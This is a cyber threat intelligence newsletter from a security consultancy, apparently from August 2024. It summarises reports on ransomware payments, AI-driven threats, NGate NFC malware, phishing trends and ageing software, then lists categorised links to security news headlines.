A recent survey reveals that nearly a third of businesses have set aside funds specifically to pay ransoms in the event of a ransomware attack, reflecting the growing threat landscape. The survey found that half of the companies had suffered a ransomware breach in the past year, with one in three admitting to paying a ransom. Additionally, 31% of businesses reported severe impacts from cyber security incidents, either within their organisation or supply chain. Despite these challenges, 29% of respondents expect a successful cyber attack in the next year, with medium-to-large enterprises planning to invest an average of €1.18 million in cyber security, although a significant portion still feel their defences are outdated.
AI-Powered Cyber Threats Are Too Overpowering for Over 50% of Security Teams
A recent report by Absolute Security reveals that over half (54%) of UK Chief Information Security Officers (CISOs) feel their security teams are unprepared for emerging AI-powered threats. The Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 CISOs, highlights growing concerns about the impact of AI on cyber resilience. Nearly half (46%) view AI as more of a threat than a benefit to their organisation's security. Additionally, 39% of CISOs have personally stopped using AI due to cyber breach concerns, and 44% have banned AI use by employees for the same reason. The findings underscore the need for enhanced strategies to address AI-driven cyber risks.
Five Novel Email Phishing Attacks and What to Do About Them
Phishing attacks are continuing to grow in sophistication, driven by AI and evolving techniques. Notably, "pastejacking" tricks victims into running malicious code via copied commands, while phishing through Google Drawings exploits the tool's perceived safety to steal personal data. Cyber criminals are also abusing URL protection services, re-writing URLs to bypass security checks. A new trend blends spear phishing with mass phishing, using AI to personalise large-scale attacks. Real-time phishing, which bypasses two-factor authentication, is now widespread, with ready-made kits available on dark web markets, illustrating the growing complexity and reach of modern phishing tactics.
NFC Traffic Stealer Targets Android Users and Their Banking Info
ESET has uncovered a new Android malware named NGate, capable of cloning contactless payment data from physical credit and debit cards, posing significant risks of fraudulent transactions. This malware, the first of its kind observed in the wild, is based on NFCgate, a legitimate tool developed by students at Germany's University of Darmstadt for research purposes. NGate exploits NFCgate’s ability to capture and relay near-field communication (NFC) traffic, extending the range of contactless communication. Threat actors are using this capability alongside phishing and social engineering tactics to steal funds via fraudulent ATM transactions.
91% of Cyber Attacks Targeted Multiple Organisations Using Mass Scanning to Uncover and Exploit Vulnerabilities
The latest "Fastly Threat Insights Report" highlights a significant rise in cyber attacks, with 91% now targeting multiple organisations by scanning them online en masse, up from 69% in 2023. The report, based on data from Fastly’s Network Learning Exchange, reveals that 36% of global internet traffic originates from bots, with short-lived IP addresses being used by attackers to evade detection. Notably, the High-Tech sector remains the top target, accounting for 37% of attacks. Fastly's findings underscore the need for adaptive security measures, as attackers increasingly exploit vulnerabilities across a broader range of targets using advanced techniques.
You Really Need to Stop Using Work Laptops for Personal Use. Here's Why
A recent study by ESET has revealed that 90% of employees use their company-provided laptops for personal activities, creating significant cyber security risks. Risky behaviours, such as viewing adult content and connecting to unsecured public Wi-Fi, were particularly common among younger workers. ESET attributes these risks to the shift towards hybrid and remote work, urging companies to enhance security measures for corporate devices and to educate employees on safe practices. These findings emphasise the need for stronger endpoint security.
Human Nature is Causing Our Cyber Security Problem
A recent analysis highlights the persistent challenge of cyber attacks, now the most significant threat to businesses, yet many organisations continue to delay adopting necessary security measures. This reluctance is attributed to a motivational deficit rooted in temporal discounting—a human tendency to prioritise immediate gratification over long-term benefits. Despite the severe consequences of security breaches and increasing regulatory pressures, organisations often procrastinate on implementing modern processes and critical tools. The article suggests that, much like automatic enrolment in retirement plans has increased participation, similar mechanisms are needed to combat procrastination and improve cyber security practices.
Cyber Crime Consolidation: The Big Fish Are Getting Bigger
A recent report by Chainalysis reveals that cyber criminals seized $16.7 billion in illicit funds during the first half of 2024, a 20% drop from the previous year, marking the fourth consecutive annual decline. Despite this overall decrease, large-scale crypto heists nearly doubled to $1.58 billion, and ransomware payments reached $459.8 million, a 2% increase from the same period last year. The median ransom payment has surged from under $200,000 in early 2023 to $1.5 million by mid-2024, reflecting a shift towards targeting larger organisations and critical infrastructure. The year is on track to be the highest-grossing for ransomware, despite disruptions to major gangs like ALPHV/BlackCat and LockBit.
Why End of Life for Applications Is the Beginning of Life for Hackers
A recent analysis highlights the significant cyber security risks posed by aging software, with over 35,000 applications set to reach end-of-life status in the next year. End-of-life software may still receive critical security patches, but end-of-support applications will no longer receive any updates, making them prime targets for threat actors. Chief Information Security Officers (CISOs) face challenges in securing backing for updates, particularly when applications are tied to outdated hardware or unsupported vendors. The Apache Log4j vulnerability exemplifies the dangers of neglecting software updates. Effective risk management requires proactive planning to address these aging software assets before they become significant vulnerabilities.
Beyond Prevention: Why Breach Readiness Is Your Cyber Security Lifeline
A recent analysis underscores the limitations of breach prevention strategies in the evolving cyber security landscape. Despite significant investments in firewalls, endpoint detection and response (EDR) and intrusion detection systems, the increasing sophistication of cyber threats has rendered breaches almost inevitable. The high number of recent breaches highlights that prevention alone is insufficient to protect critical business processes and data. Organisations must shift from relying solely on prevention to adopting a resilience-by-design approach, ensuring that they can continue operations even in the face of an attack. This proactive stance is essential to address the growing capabilities of cyber criminals.
Sources:
https://www.helpnetsecurity.com/2024/08/22/c-suite-leaders-prime-cyber-targets/
https://www.techrepublic.com/article/ransomware-trends-malwarebytes/
https://www.insurancejournal.com/news/national/2024/08/22/789621.htm
https://www.scmagazine.com/perspective/five-novel-email-phishing-attacks-and-what-to-do-about-them
https://cybernews.com/security/cybercrime-consolidation-big-fish-getting-bigger/
Governance, Risk and Compliance
Why C-suite leaders are prime cyber targets - Help Net Security
What is digital executive protection and how does it work? | CSO Online
The Cyber Security Paradox: Why Free Costs Too Much | HackerNoon
72% of cyber security leaders faced a cyber attack in last 18 months | Security Magazine
Cyber crime consolidation: the big fish are getting bigger | Cybernews
Companies aren’t as cyber resilient as they think | CIO Dive
Human Nature Is Causing Our Cyber Security Problem (darkreading.com)
You really need to stop using work laptops for personal use — here's why | TechRadar
Beyond prevention: Why breach readiness is your cyber security lifeline (securitybrief.co.nz)
CISOs list human error as their top cyber security risk (securityintelligence.com)
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
3 CIO lessons for maximizing cyber security investments | CIO Dive
Strategies for security leaders: Building a positive cyber security culture - Help Net Security
The influence of optimism bias and loss aversion in cyber risk management decisions (techxplore.com)
Governance, Risk and Compliance: The Current Context | MSSP Alert
CISOs on the Hook: SEC Tightens Cyber security Disclosures (govinfosecurity.com)
Threats
Ransomware, Extortion and Destructive Attacks
Why Are Organisations Losing the Ransomware Battle? (darkreading.com)
Ransomware Surge Exploits Cyber security Gaps Caused by M&A - Security Boulevard
Ransomware Victims Paid $460 Million in First Half of 2024 - SecurityWeek
Ransomware Trends: Most Attacks Hit Between 1am and 5am, Study Finds (techrepublic.com)
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
Cyber Crime Goes Corporate As Ransomware Gangs Want More (pymnts.com)
Ransomware on track for record profits, even as fewer victims pay | SC Media (scmagazine.com)
Third of firms put money aside to pay cyber ransoms (rte.ie)
Ransomware attacks rise 20% in July, industrial sectors hit hardest (securitybrief.co.nz)
Ransomware Attack Proceeds, Crypto Theft Rise in First Half | MSSP Alert
No honour among ransomware thieves: affiliates' trust craters after takedown (computing.co.uk)
Tracing the destructive path of ransomware's evolution (betanews.com)
Ransomware attacks rise over 60 percent (betanews.com)
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack - IT Security Guru
Q2’24 marks second highest quarter for ransomware attacks, says Corvus - Reinsurance News
RansomHub Rolls Out Brand-New, EDR-Killing BYOVD Binary (darkreading.com)
Chainalysis: Illicit Crypto Activity Down 20%, Stolen Funds and Ransomware Up | Cryptoglobe
Why you need to know about ransomware | Malwarebytes
Critical industries top ransomware hitlist, attacks dwindle • The Register
Understanding the 'Morphology' of Ransomware: A Deeper Dive - SecurityWeek
U.S. charges Karakurt extortion gang’s “cold case” negotiator (bleepingcomputer.com)
Qilin Targets Chrome-Stored Credentials In “Troubling” New Attack (informationsecuritybuzz.com)
The changing dynamics of ransomware as law enforcement strikes - Help Net Security
Ransomware Victims
How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch
Top US oilfield firm Halliburton hit by cyber attack, source says (yahoo.com)
Halliburton Suffers Cyber Attack | Houston Press
Medibank's data breach costs anticipated to reach $126m by mid-2025 - Security - iTnews
AutoCanada Hit by Cyber Attack - SecurityWeek
Three councils fall victim to cyber-attack (themj.co.uk)
CDK Global antitrust lawsuit leads to $100 million payout for car dealers (qz.com)
Top architectural firm reveals it was hit by major ransomware attack | TechRadar
Phishing & Email Based Attacks
The evolving threat landscape: Staying ahead of phishing attack trends | TechRadar
Five novel email phishing attacks – and what to do about them | SC Media (scmagazine.com)
The cyber attack cycle: First comes outage, next comes phishing (securityintelligence.com)
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
Western, Russian Civil Society Targeted in Sophisticated Phishing Attacks - SecurityWeek
Abnormal sees 350% uptick in phishing via file-sharing sites (securitybrief.co.nz)
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
Android and iOS users targeted with novel banking app phishing campaign | Cybernews
Android & iOS Users Targeted with New Phishing Attack Using PWAs & WebAPKs (cybersecuritynews.com)
Anatomy of an Attack (thehackernews.com)
This sophisticated new phishing campaign is going after US government contractors | TechRadar
Iran named as source of Trump campaign phish, leaks • The Register
Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America (thehackernews.com)
Other Social Engineering
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Artificial Intelligence
AI-powered cyber threats are too overpowering for over 50% of security teams - IT Security Guru
Protecting against AI-enabled cyber crime | Professional Security
73% of orgs embracing gen AI, but far fewer are assessing risks | VentureBeat
Fraud tactics and the growing prevalence of AI scams - Help Net Security
xAI’s new Grok image generator floods X with controversial AI fakes - The Verge
Could AI be your company’s Achilles heel? - Raconteur
Deepfakes Are Having a Deeper Impact on These Three Industries (techspective.net)
Organisations turn to biometrics to counter deepfakes - Help Net Security
Artificial intelligence, real anxiety: Why we can't stop worrying and love AI | ZDNET
Microsoft Copilot Studio Vulnerability Led to Information Disclosure - SecurityWeek
OpenAI kills Iranian accounts spreading US election disinfo • The Register
2FA/MFA
The Silver Bullet of MFA Was Never Enough (darkreading.com)
Microsoft Mandates MFA for All Azure Sign-Ins - Infosecurity Magazine (infosecurity-magazine.com)
Malware
Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware (thehackernews.com)
Cyber criminals launch new malware that can completely wipe out your antivirus | TechRadar
This new threat proves that Macs aren't immune from malware | Digital Trends
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
New Russian threat targets over 100 Apple macOS browser extensions | Fox News
Beyond the wail: deconstructing the BANSHEE infostealer — Elastic Security Labs
Styx Stealer Malware Stealing Browser And Instant Messenger Data (cybersecuritynews.com)
5 Emerging Malware Variants You Must Be Aware Of (informationsecuritybuzz.com)
Cyber criminals Exploit Popular Software Searches to Spread FakeBat Malware (thehackernews.com)
Massive infostealer campaign exploits legitimate brands | SC Media (scmagazine.com)
Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor (thehackernews.com)
Hackers deployed new malware against university in Taiwan (therecord.media)
New macOS Malware TodoSwift Linked to North Korean Hacking Groups (thehackernews.com)
Chinese Threat Actors Use MSI Files to Bypass Windows, VT Detection (darkreading.com)
Hackers may have found an entirely new way to backdoor into Windows systems | TechRadar
Infostealers Waltz Through macOS to Grab Crypto Wallets, Browser Creds (darkreading.com)
New macOS Malware "Cthulhu Stealer" Targets Apple Users' Data (thehackernews.com)
Two Years On, Log4Shell Vulnerability Still Being Exploited to Deploy Malware - SecurityWeek
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware (thehackernews.com)
Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics (thehackernews.com)
Has my PC been hacked? 5 ways to detect virus attacks, step-by-step | PCWorld
Blind Eagle Hackers Exploit Spear-Phishing to Deploy RATs in Latin America (thehackernews.com)
Mobile
New NGate Android malware uses NFC chip to steal credit card data (bleepingcomputer.com)
Google Pixels Carry Verizon App Doubling As a Backdoor (darkreading.com)
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
Android & iOS Users Targeted with New Phishing Attack Using PWAs & WebAPKs (cybersecuritynews.com)
Czech Mobile Users Targeted in New Banking Credential Theft Scheme (thehackernews.com)
Does Your Smartphone Need An Antivirus App? - TechRound
Denial of Service/DoS/DDOS
Average DDoS attack costs $6,000 per minute - Help Net Security
Moscow detains scientist suspected of carrying out DDoS attacks on Russia (therecord.media)
Russia blames mass tech outages on DDoS attack | TechRadar
49% of DDoS attacks targeted gaming organisations | Security Magazine
Internet of Things – IoT
Russia fears Ukraine hijacking home CCTV systems for intel • The Register
Data Breaches/Leaks
The saga of the National Public Data Social Security number leak continues - The Verge
Thousands of Oracle NetSuite sites said to be exposing customer data | SC Media (scmagazine.com)
Florida data broker says it was ransacked by cyber-thieves • The Register
The Slow-Burn Nightmare of the National Public Data Breach | WIRED
FlightAware admits passwords, SSNs exposed for over 3 years • The Register
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Security flaws in Microsoft's Health Bot put patient data at risk (computing.co.uk)
Apple Prototypes and Corporate Secrets Are for Sale Online—If You Know Where to Look | WIRED
Organised Crime & Criminal Actors
Cyber crime consolidation: the big fish are getting bigger | Cybernews
Researchers Uncover New Infrastructure Tied to FIN7 Cyber crime Group (thehackernews.com)
Digital wallets can allow purchases with stolen credit cards • The Register
Kim Dotcom: 5 outrageous moments from the internet’s anti-hero (thenextweb.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Ransomware Attack Proceeds, Crypto Theft Rise in First Half | MSSP Alert
Hackers linked to $14M Holograph crypto heist arrested in Italy (bleepingcomputer.com)
Digital wallets can allow purchases with stolen credit cards • The Register
Chainalysis: Illicit Crypto Activity Down 20%, Stolen Funds and Ransomware Up | Cryptoglobe
Infostealers Waltz Through macOS to Grab Crypto Wallets, Browser Creds (darkreading.com)
Unicoin recovers from G-Suite raid, hints at data woes • The Register
PostgreSQL databases under attack - Help Net Security
11 Cyber security Risks for NFT Buyers | HackerNoon
Insider Risk and Insider Threats
You really need to stop using work laptops for personal use — here's why | TechRadar
CISOs list human error as their top cyber security risk (securityintelligence.com)
Human Nature Is Causing Our Cyber security Problem (darkreading.com)
Insurance
Supply Chain and Third Parties
Three councils fall victim to cyber-attack (themj.co.uk)
Cloud/SaaS
Survey Surfaces Growing SaaS Application Security Concerns - Security Boulevard
45% of tech leaders have experienced a SaaS cyber security incident | Security Magazine
Cloud Misconfigurations Expose 110,000 Domains to Extortion in Widespread Campaign - SecurityWeek
The Hidden Security Gaps in Your SaaS Apps: Are You Doing Due Diligence? (thehackernews.com)
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
It's Time To Untangle the SaaS Ball of Yarn (thehackernews.com)
8 cloud security gotchas most CISOs miss | CSO Online
The Hidden Security Gaps in Your SaaS Apps: Are You Doing Due Diligence? - Security Boulevard
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
GitHub Enterprise Server vulnerable to critical auth bypass flaw (bleepingcomputer.com)
Microsoft Mandates MFA for All Azure Sign-Ins - Infosecurity Magazine (infosecurity-magazine.com)
Thousands of Apps Using AWS ALB Exposed to Attacks Due to Configuration Issue - SecurityWeek
Azure Kubernetes Services Vulnerability Exposed Sensitive Information - SecurityWeek
Authentication bypass discovered in Microsoft Entra ID | Security Magazine
North Korean Hackers Pivot Away From Public Cloud (inforisktoday.com)
Outages
The cyber attack cycle: First comes outage, next comes phishing (securityintelligence.com)
CrowdStrike hits out at rivals’ ‘shady’ attacks after global IT outage
CrowdStrike outage lessons learned: Questions to ask vendors | TechTarget
CrowdStrike deja vu for IT admins with 'performance issue' • The Register
Post Office systems crash hits 'collapsing' Horizon system | Computer Weekly
Encryption
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Linux and Open Source
Don't panic! It's only 60 Linux CVE security bulletins a week | ZDNET
PostgreSQL databases under attack - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
The saga of the National Public Data Social Security number leak continues - The Verge
Some major firms are being targeted by this dangerous new cyber crime campaign | TechRadar
Qilin Targets Chrome-Stored Credentials In “Troubling” New Attack (informationsecuritybuzz.com)
Czech Mobile Users Targeted in New Banking Credential Theft Scheme (thehackernews.com)
Social Media
NFC Traffic Stealer Targets Android Users & Their Banking Info (darkreading.com)
How Hackers Use Emergency Data Requests to Steal User Data (govinfosecurity.com)
Training, Education and Awareness
The Cyber Security Paradox: Why Free Costs Too Much | HackerNoon
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
The worst security test ever? University slammed over fake Ebola scare as phishing test | TechRadar
Regulations, Fines and Legislation
Cisco wants United Nations to revisit cyber crime Convention • The Register
Cyber security Is Everywhere: ENISA COO - GovInfoSecurity
EU Directive Network and Information Security (NIS2): Modernizing security compliance (betanews.com)
CISOs on the Hook: SEC Tightens Cyber security Disclosures (govinfosecurity.com)
FAA Proposes New Aircraft Cyber security Rules - Infosecurity Magazine (infosecurity-magazine.com)
Models, Frameworks and Standards
ISO 27001 vs NIST: The Differences and How They Overlap - Security Boulevard
EU Directive Network and Information Security (NIS2): Modernizing security compliance (betanews.com)
Careers, Working in Cyber and Information Security
British civil service to target cyber specialists with new graduate scheme (therecord.media)
Law Enforcement Action and Take Downs
Hackers linked to $14M Holograph crypto heist arrested in Italy (bleepingcomputer.com)
National Crime Agency threatens extraditions over rise in sextortion cases (yahoo.com)
U.S. charges Karakurt extortion gang’s “cold case” negotiator (bleepingcomputer.com)
No honour among ransomware thieves: affiliates' trust craters after takedown (computing.co.uk)
Misinformation, Disinformation and Propaganda
FBI says Iranian hackers are targeting both presidential campaigns (engadget.com)
Are 2024 US Political Campaigns Prepared for Coming Cyber Threats? (darkreading.com)
Azure domains and Google abused to spread disinformation and malware (bleepingcomputer.com)
Meet the Iranian cyber attackers suspected of trying to hack the U.S. election - Washington Times
US warns of Iranian hackers escalating influence operations (bleepingcomputer.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Nation State Actors
Are 2024 US Political Campaigns Prepared for Coming Cyber Threats? (darkreading.com)
China
US lawmakers urge probe into TP-Link over fears of possible cyber attacks | TechRadar
Chinese Threat Actors Use MSI Files to Bypass Windows, VT Detection (darkreading.com)
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Hackers deployed new malware against university in Taiwan (therecord.media)
Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics (thehackernews.com)
Russia
Russian Hackers Using Fake Brand Sites to Spread DanaBot and StealC Malware (thehackernews.com)
Western, Russian Civil Society Targeted in Sophisticated Phishing Attacks - SecurityWeek
Cyber attack hits Monobank, Ukraine's largest direct bank (kyivindependent.com)
Ukraine subjected to novel malware attack | SC Media (scmagazine.com)
Russia fears Ukraine hijacking home CCTV systems for intel • The Register
Moscow detains scientist suspected of carrying out DDoS attacks on Russia (therecord.media)
Russia blames mass tech outages on DDoS attack | TechRadar
Iran
Meet the Iranian cyber attackers suspected of trying to hack the U.S. election - Washington Times
FBI says Iranian hackers are targeting both presidential campaigns (engadget.com)
Iran named as source of Trump campaign phish, leaks • The Register
Iranian Cyber Group TA453 Targets Jewish Leader with New AnvilEcho Malware (thehackernews.com)
OpenAI kills Iranian accounts spreading US election disinfo • The Register
Iran and Israel are already engaged in a fierce cyberwar (economist.com)
North Korea
New macOS Malware TodoSwift Linked to North Korean Hacking Groups (thehackernews.com)
North Korean Hackers Pivot Away From Public Cloud (inforisktoday.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
Ransomware Gangs Introduce New EDR-Killing Tool (informationsecuritybuzz.com)
73% of orgs embracing gen AI, but far fewer are assessing risks | VentureBeat
The Cyber security Paradox: Why Free Costs Too Much | HackerNoon
Cyber Resilience Lacking, Organisations Overconfident - Security Boulevard
Beyond prevention: Why breach readiness is your cyber security lifeline (securitybrief.co.nz)
The Silver Bullet of MFA Was Never Enough (darkreading.com)
Cyber criminals launch new malware that can completely wipe out your antivirus | TechRadar
Common API security issues: From exposed secrets to unauthorized access - Help Net Security
Organisations turn to biometrics to counter deepfakes - Help Net Security
Cyber criminals exploit file sharing services to advance phishing attacks - Help Net Security
This system can sort real pictures from AI fakes — why aren’t platforms using it? - The Verge
RansomHub Rolls Out Brand-New, EDR-Killing BYOVD Binary (darkreading.com)
How Pen Testing is Evolving and Where it’s Headed Next - Security Boulevard
Cyber security and Physical Security Go Hand-in-Hand | HHS.gov
3 lessons for maximizing cyber security investments | CIO Dive
The influence of optimism bias and loss aversion in cyber risk management decisions (techxplore.com)
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Are virtual machines safe for end users? | TechTarget
AI for application security: Balancing automation with human oversight - Help Net Security
EDR vs. MDR vs. XDR: Key differences | TechTarget
Top Cyber security Risk Mitigation Strategies Every Business Should Implement (cybersaint.io)
Other News
72% of cyber security leaders faced a cyber attack in last 18 months | Security Magazine
72% of Senior Executives Targeted by Cyber attacks in the Last 18 Months | Business Wire
Sitting Ducks Attack: Over 1M Domains At Risk Of Takeover! - Security Boulevard
How Hollywood hacking scenes turn cyber security into entertainment (globenewswire.com)
Browser Syncing Is Useful, but Be Aware of These 4 Security Issues (makeuseof.com)
36% of global internet traffic originated from bots | Security Magazine
How might the UK's cyber landscape change under Labour? | Computer Weekly
Are the New FAA Cyber Requirements for Future Planes Enough? (govinfosecurity.com)
Preparing the IT Infrastructure For the Next Era of Cyber attacks | Entrepreneur
Switzerland to join European Cyber Security Organisation (aa.com.tr)
Protecting connected, self-driving vehicles from hackers (techxplore.com)
Empowering SMBs On The Path To Cyber security Maturity (forbes.com)
Olympics were case in point of cyber threat to global sport (emergingrisks.co.uk)
Africa's Economies Feel Pain of Cyber security Deficit (darkreading.com)
Food security: Accelerating national protections around critical infrastructure - Help Net Security
Security Alert: U.K. Political Donation Sites at Risk - Security Boulevard
Vulnerability Management
Fastly report reveals 91% of cyber attacks now target multiple organisations - SiliconANGLE
Why End of Life for Applications Is the Beginning of Life for Hackers (darkreading.com)
The Fundamentals of Vulnerability Management Explained | MSSP Alert
What's Typically the Weakest Point in a Business's Cyber Security? - Root-Nation.com
How SSH Flaws Expose Vulnerabilities, Endanger Enterprises (inforisktoday.com)
Vulnerability prioritization is only the beginning - Help Net Security
Vulnerabilities
PoC Exploit Released for Windows 0-Day Downgrade Attack (cybersecuritynews.com)
Google fixes ninth Chrome zero-day exploited in attacks this year (bleepingcomputer.com)
If You Have an AMD CPU, You Must Install This Vital Security Update (makeuseof.com)
Microsoft shares workaround for Outlook crashing after opening (bleepingcomputer.com)
Kubernetes Vulnerability Exposes Clusters to Command Injection Attacks (cybersecuritynews.com)
Windows 0-Day Flaw Exploited by Lazarus to Gain Unauthorized Access (cybersecuritynews.com)
Serious flaws in Microsoft apps on macOS could let hackers spy on users | ITPro
Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor (thehackernews.com)
F5 Patches High-Severity Vulnerabilities in BIG-IP, NGINX Plus - SecurityWeek
Symantec warns of new sophisticated backdoor exploiting patched PHP vulnerability - SiliconANGLE
AMD changes its mind, says it will patch more Ryzen chips against security flaw | TechRadar
Authentication bypass discovered in Microsoft Entra ID | Security Magazine
Thousands of Apps Using AWS ALB Exposed to Attacks Due to Configuration Issue - SecurityWeek
Security flaws in Microsoft's Health Bot put patient data at risk (computing.co.uk)
Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data (thehackernews.com)
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control (thehackernews.com)
Atlassian Patches Vulnerabilities in Bamboo, Confluence, Crowd, Jira - SecurityWeek
SolarWinds left hardcoded credentials in helpdesk product • The Register
Azure Kubernetes Services Vulnerability Exposed Sensitive Information - SecurityWeek
Litespeed Cache bug exposes millions of WordPress sites to takeover attacks (bleepingcomputer.com)
GitHub Enterprise Server vulnerable to critical auth bypass flaw (bleepingcomputer.com)
Critical Flaw in Donation Plugin Exposed 100,000 WordPress Sites to Takeover - SecurityWeek
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.